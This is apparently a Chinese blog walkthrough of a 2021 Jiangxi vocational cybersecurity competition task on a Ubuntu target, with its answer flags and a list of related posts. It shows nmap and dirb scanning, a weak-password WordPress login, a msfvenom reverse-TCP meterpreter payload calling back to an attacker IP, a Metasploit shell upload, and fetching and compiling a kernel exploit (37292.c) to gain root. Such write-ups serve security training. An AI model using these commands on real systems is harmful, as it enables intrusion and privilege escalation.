2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权
2021年中职"网络安全"江西省赛题—B-1:系统漏洞利用与提权
- 学习交流
- B-1:系统漏洞利用与提权
学习交流
学习交流,或者遇到不会的可以+qq:3455475542
B-1:系统漏洞利用与提权
任务环境说明:
服务器场景:PYsystem001
服务器场景操作系统:Ubuntu(显示链接)
服务器用户名:未知 密码:未知
- 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口…,端口n])提交;
nmap -sV ip 扫描
- 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;
通过题目我们知道靶机有网站,我们利用kali中的dirb扫描网站的后台。
优先扫描特殊端口:dirb http://172.16.105.245:8080/
扫描出后台地址,通过题目提示弱口令登录
falg[admin,123456]
4. 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;
这里固定的falg:[Payload]
命令:Msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.103 lport=8888 -f exe -o shell.exe
5. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;
我这里没有用这个上传的,我用的是msf中的wp_admin_shell_upload
set rhost 172.16.105.245
set username admin
set password 123456
set targeturi /wordpress
shell连接后whoami查看权限
falg[daemon]
7. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;
命令:uname -a查看系统内核版本号
falg[3.13.0]
8. 在Kali攻击机中查找可使用的漏洞源码,将找到的漏洞源码文件名作为FLAG(形式:[文件名])提交;
利用kali中的searchsploit命令查看可使用的漏洞源码
命令searchsploit 3.13.0
falg[37292.c]
9. 利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;
进入存放漏洞源码的目录 cd /usr/share/exploitdb/exploits/linux/local/
把源码复制到kali自带的网站目录下 cp 37292.c /var/www/html/
启动kali的apche服务
使用python切换至交互式shell
命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’
使用命令wget把刚刚上传中37292.c文件下载下来
编译37292.c生成shell文件
运行shell文件,获得root权限
进入root目录查看txt文件名为adftutij.txt
flag[adftutij.txt]
11. 利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。
cat查看文件内容
flag[hyjufk983]
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权相关推荐
- 2022年中职网络空间安全国赛竞赛题解析仅代表自己的建议——2022年中职网络安全国赛竞赛试题2解析
2022年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (2) (总分100分) 赛题说明 一.竞赛项目简介 "网络安全"竞赛共分A.基础设施设置与安全加固:B.网络安全事件响 ...
- 2022年中职网络空间安全国赛竞赛题解析仅代表自己的建议——2022年中职网络安全国赛竞赛试题9解析
2022年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (9) (总分100分) 赛题说明 一.竞赛项目简介 "网络安全"竞赛共分A.基础设施设置与安全加固:B.网络安全事件响 ...
- 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(7)解析
2021年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (7) (总分100分) 赛题说明 一.竞赛项目简介 "网络安全"竞赛共分A. 基础设施设置与安全加固:B. 网络安全事 ...
- 2021年中职组网络安全山东省赛“正式” 赛卷
2021 年山东省职业院校技能大赛 中职组"网络安全" 赛项 竞赛题库 网络安全赛项专家组 2021 年 11 月 赛题说明 一. 竞赛时间安排与分值权重 二. 竞赛拓扑图 模块编 ...
- 2023年中职网络安全竞赛试题—竞赛样题
网络安全竞赛试题 (总分1000分) 赛题说明 一.竞赛项目简介 "网络安全"竞赛共分A.基础设施设置与安全加固:B.网络安全事件响应.数字取证调查和应用安全:C.CTF夺旗-攻击 ...
- 甘肃省2021年中职生高考成绩查询,甘肃2021年中专可以高考吗
中专生是能参加普通高考的,中专毕业后参加高考分为几种形式,普通高考.春季高考和成人高考,每种形式的高考都是不同.中专学历属于高中阶段的同等学历,所以说是完全符合报名条件的,但是中专生跟高中生的学习内容 ...
- 怎样查询2021年中职生高考成绩,中职生统考录取分数线,2020年高职高考各个院校录取分数线...
很多小伙伴步入社会后多少感觉自己的学历太低,那觉得自己学历不够的童鞋可以来看看:中职生统考录取分数线.很多人想要提升学历又不知道怎么选择,那你就需要好好阅读以下文章:2020年高职高考各个院校录取分数 ...
- 【英文版+中文版】2021年美国大学生数学建模赛题发布!!!
一.比赛时间 2021年比赛的日期和时间: 报名截止日期:2021年2月4日,美国东部标准时间下午3:00之前. 比赛从2021年2月4日(星期四)美国东部标准时间下午5:00开始. 比赛结束时间:美 ...
- 2021年五一建模B赛题+思路
背景: 随着我国经济的高速发展,城市空间环境复杂性急剧上升,各种事故灾害频发,安全风险不断增大,消防救援队承担的任务也呈现多样化.复杂化的趋势.对于每一起出警事件,消防救援队都会对其进行详细的记录. ...
- 2022中职网络安全国赛B模块任务六Telnet 弱口令渗透测试
B-6 任务六:Telnet 弱口令渗透测试 *任务说明:仅能获取 Server1 的 IP 地址 1.在渗透机 Kali2.0 中使用 Zenmap 工具扫描服务器场景 Windows 所在网段(例 ...
最新文章
- jQuery计数子元素
- 功能性,声明式和命令式编程[关闭]
- c# 定位内存快速增长_c#如何避免内存分配瓶颈以提高多线程性能
- Alpha版使用说明
- python编程少儿游戏编程_少儿编程课堂|python – 用游戏学编程
- 免gre美国计算机硕士,美国硕士免GRE/GMAT的学校-计算机篇
- java培训第一阶段测试总结,达内学员Java培训阶段总结:反躬自省,愈渐完美
- 简单说说通讯设备的热设计
- python 获取当前目录_如何在Python中获取当前的工作目录?
- Windows编程—Windows驱动中定时器的使用
- 函数 tostring_QDate、QTime、QDateTime的相关函数说明
- 冰河木马使用(纯属学习)
- STP协议:生成树协议(二层防环机制:防止网桥网络中冗余链路形成环路工作)
- Python-爬虫抓取视频
- Scarlett~スカーレット 有感,新的价值观
- 视频解析网站 服务器上,视频云解析服务器上
- PS 常用的形状工具
- 生产环境 java.util.concurrent.RejectedExecutionException: event executor terminated 错误分析
- webpack4打包js
- 写博客能月入10K?